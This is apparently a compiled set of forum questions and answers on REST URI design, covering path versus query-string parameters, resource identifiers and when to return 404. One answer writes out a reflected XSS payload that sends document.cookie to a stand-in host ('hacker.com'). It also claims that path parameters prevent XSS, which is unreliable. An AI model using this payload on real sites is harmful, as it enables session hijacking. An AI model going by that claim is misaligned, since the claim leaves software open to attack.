Is it RESTful to match a URI in a database and display associated content via request forwarding? - rest

So, I'm building a Web site application that will comprise a small set of content files each dedicated to a general purpose, rather than a large set of files each dedicated to a particular piece of information. In other words, instead of /index.php, /aboutme.php, /contact.php, etc., there would just be /index.php (basically just a shell with HTML and ) and then content.php, error.php, 404.php, etc.
To deliver content, I plan to store "directory structures" and associated content in a data table, capture URIs, and then query the data table to see if the URI matches a stored "directory structure". If there's a match, the associated content will be returned to the application, which will use Pear's HTTP_Request2 to send a request to content.php. Then, content.php will display the appropriate content that was returned from the database.
EDIT 1: For example:
a user types www.somesite.com/contact/ into their browser
index.php loads
a script upstream of the HTML header on index.php does the following:
submits a mysql query and looks for WHERE path = $_SERVER[REQUEST_URI]
if it finds a match, it sets $content = $dbResults->content and POSTs $content to /pages/content.php for display. The original URI is preserved, although /pages/content.php and /index.php are actually delivering the content
if it finds no match, the contents of /pages/404.php are returned to the user. Here, too, the original URI is preserved even though index.php and /pages/404.php are actually delivering the content.
Is this a RESTful approach? On the one hand, the URI is being used to access a particular resource (a tuple in a data table), but on the other hand, I guess I always thought of a "resource" as an actual file in an actual directory.
I'm not looking to be a REST purist, I'm just really delving into the more esoteric aspects of and approaches to working with HTTP and am looking to refine my knowledge and understanding...

OK, my conclusion is that there is nothing inherently unRESTful about my approach, but how I use the URIs to access the data tables seems to be critical. I don't think it's in the spirit of REST to store a resource's full path in that resource's row in a data table.
Instead, I think it's important to have a unique tuple for each "directory" referenced in a URI. The way I'm setting this up now is to create a "collection" table and a "resource" table. A collection is a group of resources, and a resource is a single entity (a content page, an image, etc., or even a collection, which allows for nesting and taxonomic structuring).
So, for instance, /portfolio would correspond with a portfolio entry in the collection table and the resource table, as would /portfolio/spec-ads; however, /portfolio/spec-ads/hersheys-spec-ad would correspond to an entry only in the resource table. That entry would contain, say, embed code for a Hershey's spec ad on YouTube.
I'm still working out an efficient way to build a query from a parsed URI with multiple "directories," but I'm getting there. The next step will be to work the other way and build a query that constructs a nav system with RESTful URIs. Again, though, I think the approach I laid out in the original question is RESTful, so long as I properly correlate URIs, queries, and the data architecture.
The more I walk down this path, the more I like it...

Related

Building a REST API: How to decide which params go to Headers, Body, URL or query?

How do you decide where do parameters go?
Suppose the API is for an object, which has an ID, a few fields and each request may or may not have a token. There has to be GET, PUT, POST and DELETE requests for the object.
As a rule, you want all of the parameters necessary to identify a resource to be directly encoded into the URI somewhere. That allows you to bookmark the URI for re-use later, and to share that bookmark with another person/process.
Example:
Building a REST API: How to decide which params go to Headers, Body, URL or query?
All of the context you need to GET this resource is right here. You can click it, save it, send it off in an email, and it is still useful, of itself.
So where in the URI does information go?
If the information is only needed by the client once the representation has been downloaded, then you might consider encoding it into the fragment.
The fragment identifier component of a URI allows indirect identification of a secondary resource by reference to a primary resource and additional identifying information.
On the web, fragments were useful because they allowed you to call upon the user agent to focus at a particular element in a representation. The fragment is not sent over the network, but only used on the client side. Think Data Transfer Object - one big cacheable document (so we don't need a lot of round trips) with lots of URI that point to specific information within it.
Other parameters can be encoded into path segments or the query string. The machines don't care (20 years ago, this was somewhat less true - we would sometimes have to work around caches that didn't handle the query part of a URI correctly).
URI with parameters configured via application/x-www-form-urlencoded query strings were convenient on the web because HTML had form support for creating those identifiers on the client.
These days, we can use URI templates to describe how to compute a new URI, which gives you more options.
Relative resolution gives us a general purpose mechanism for computing a new URI from a given reference identifier. Think dot-references with symbolic links. That mechanism is primarily based on navigating the hierarchical part of the URI, which is to say that path.
The machines don't care of the hierarchy of resources and the hierarchy of identifiers are parallel
# Here's an identifier for a collection
/collection
# Here's an identifier for a member of this collection
/collection/member
# Here's an identifier for a collection
/2c957fb6-ac92-4fdb-a086-02292c3b7c7c
# Here's an identifier for a member of this collection
/41d36a69-d10c-4503-8e5e-3b2d64e9c3a6
All of these samples are fine, as far as the machines are concerned; but human beings tend to have an easier time working with the top set.
Headers are metadata that belongs to the domain of "transporting documents over a network".
The body is the document itself - it is the message that is being transported over the network (the http request and the headers are, in a sense, the envelope that carries the message). Yes, this sometimes means that information that is in the message also gets copied into the headers, or copied via the template into the target-uri.

REST strategy for overloading GET verb

Consider a need to create a GET endpoint for fetching Member details using either of 4 options (It's common in legacy application with RPC calls)
Get member by ID
Get member by SSN
Get member by a combination of Phone and LastName (both must be passed)
What's a recommended strategy to live the REST spirit and yet provide this flexibility?
Some options I could think of are:
Parameters Based
/user/{ID}
/user?ssn=?
/user?phone=?&lname=?
Separate Endpoints
/user/{ID}
/user/SSN/{SSNID}
/user/{lname}/{phone}
RPC for custom
/user/{ID}
/user/findBySSN/
/user/findbycontact/
REST doesn't care what spelling you use for your identifiers.
For example, think about how you would do this on the web. You would provide forms, one for each set of search criteria. The consumer would choose which form to use, and submit the form, without ever knowing what the URI is.
In the case of HTML forms, there are specific processing rules for describing how the form information will be copied into the URI. The form takes on the aspect of a URI Template.
A URI Template provides both a structural description of a URI space and, when variable values are provided, machine-readable instructions on how to construct a URI corresponding to those values.
But there aren't any rules saying that restrict the server from providing a URI template that directs the client to copy the variable values into path segments rather than into the query string.
In other words, in REST, the server retains control of its own URI space.
You might sometimes prefer to use path segments because of their hierarchical nature, which may be convenient if you want the client to use relative resolution of relative references in your representations.
REST ≠ pretty URLs. The two are orthogonal.
Your question is about the latter, I feel.
Whilst the other answers have been good, if you want your API to work with HTML forms, go with query parameters on the collection /user resource for all fields, even for ID (assuming a human is typing these in based on information they are getting from sheets of paper on their desk, etc.)
If your server is able to produce links to each record, always produce canonical links such as /users/{id}, don't duplicate data under different URLs.

REST API with segmented/path ID

I am trying to design a REST API for a system where the resources are essentially identified by path-like addresses with varying numbers of segments. For example, a "Schema" resource could be represented on the file system as follows:
/Resources/Schemas/MyFolder2/MyFolder5/MySchema27
The file-system path /Resources/Schemas/ is the root folder for all Schemas, and everything below this is entirely user defined (as far as folder depth and folder naming). So, in the example above, the particular Schema would be uniquely identified by the following address (since "MySchema27" by itself would not necessarily be unique):
/MyFolder2/MyFolder5/MySchema27
What would be the best way to refer to a resource like this in a REST API?
If I have a /schemas collection my REST URL could be:
/schemas/MyFolder2/MyFolder5/MySchema27
Would that be a reasonable approach? Are there better ways of handling this?
I could, potentially, do a 2-step approach where the client would first have to search for a Schema using the Schema address (in URL parameters or in the request body), which would then return a unique ID that could then be used with a more traditional /schemas/{id} design. Not sure that I like that, though, especially since it would mean tracking a separate ID for each resource. Thoughts? Thanks.
The usual way to add a resource to your "folder" /Resources/Schemas/ is to make a POST request on it with the body of this POST request containing a representation of the resource to add, then the server will take care of finding the next free {id} and and setting the new resource to /Resources/Schemas/{id}.
Another approach is to, as you said, make a GET request on /Resources/Schemas/new which would return the next free {id}, and then, make a second request PUT directly on /Resources/Schemas/{id}. However this second approach is not as secure as the first since two simultaneous request could lead to the same new {id} returned and so the second PUT would erase the first. You can secure this with some sort of reservation mechanism.
This is called as Resource Based URI approach for building REST services . Follow these wonderful set of video tutorials to understand more about them and learn how to implement too . https://javabrains.io/courses/javaee_jaxrs

Querystring in REST Resource url

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.
There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396
The query component is a string of
information to be interpreted by the
resource.
This line was later changed in RFC 3986 to be:
The query component contains
non-hierarchical data that, along with
data in the path component (Section
3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.
In typical REST API's, example #1 is more correct. Resources are represented as URI and #1 does that more. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:
http://localhost/products/code/4xheaua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".
There are two use cases for GET
Get a uniquely identified resource
Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
If we look at say the Google Maps API we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.
IMO the path component should always state what you want to retrieve. An URL like http://localhost/findbyproductcode does only say I want to retrieve something by product code, but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)
The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. Big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example watches are an accessory that have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.
The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheau ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.
This question is deticated to, what is the cleaner approach. But I want to focus on a different aspect, called security. As I started working intensively on application security I found out that a reflected XSS attack can be successfully prevented by using PathParams (appraoch 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the html source to the client. Unfortunately some application will do that, and this is why PathParams may prevent XSS attacks)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>**
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all ve specified. In the first form, their positions in the hierarchy would have to be fixed and padded...
Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.
By the REST client the URI structure does not matter, because it follows links annotated with semantics, and never parses the URI.
By the developer who writes the routing logic and the link generation logic, and probably want to understand log by checking the URLs the URI structure does matter. By REST we map URIs to resources and not to operations - Fielding dissertation / uniform interface / identification of resources.
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "by reducing the collection to a single resource using an unique identifier, the unique identifier must be always part of the path and not the query". This is just the same what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.
Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote Mc'Donalds server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.

REST URI definition

I can't get comfortable with defining 'good REST' URIs. The scenario is an existing site with products for sale. You can view data in a number of views, drilling down a hierarchy, but basically cat1/cat/ products, or cat 2/cat3/products or any combination of categories 1 to 4. The other products view is based on a search.
How do you form the URI's?
products/??????
Having designed a site that follows the principles of the REST architecture, my advice is to base your decision on your URI structure solely on your server design, that is how your server will parse an incoming URI and deliver the corresponding resource.
One principle of REST design (as I see it) is that your users/clients will NEVER have to form a URL to find a resource, they will instead read some hypertext (i.e. HTML) which describes resources, identify what they want, and get the appropriate link from the hypertext (for example, in HTML, the href attribute of the tag holds the URL, which could just as well be a random string of characters.
Again, in my opinion, if your application requires that a user/client be able to perform searches for arbitrarily named categories, it's probably not suitable to have a RESTfully designed interface.
You can use use a query string in your URI:
/products?categories=german,adult,foo,bar
In order to avoid multiple URIs you could enforce some logic like alphabetical ordering of categories on the server side so a request to the above URI would actually redirect via a 301 Moved Permanently response to:
/products?categories=adult,bar,foo,german
For that above query part pattern to work in browsers you will have to use JavaScript to generate the query from any html forms - you could, alternatively, do it like this if you wanted to avoid that particular problem:
/products?cat1=adult&cat2=bar&cat3=foo&cat4=german
Yes - the problem here is that you don't have a unique ID for the resource because:
products/cat1/cat4
Is actually the same page as
products/cat4/cat1
(Presumably a view of everything tagged with cat1 and cat4, or all matches from cat1 and cat4)
If your categories where organised into a hierarchy you would know that "cat6" is a child of "cat1", for example.
So your two options would be
1) Enforce a natural order for the categories
or
2) Have two different URI's essentially pointing to the same resource (with a 301 permanant redirect to your preferred resource).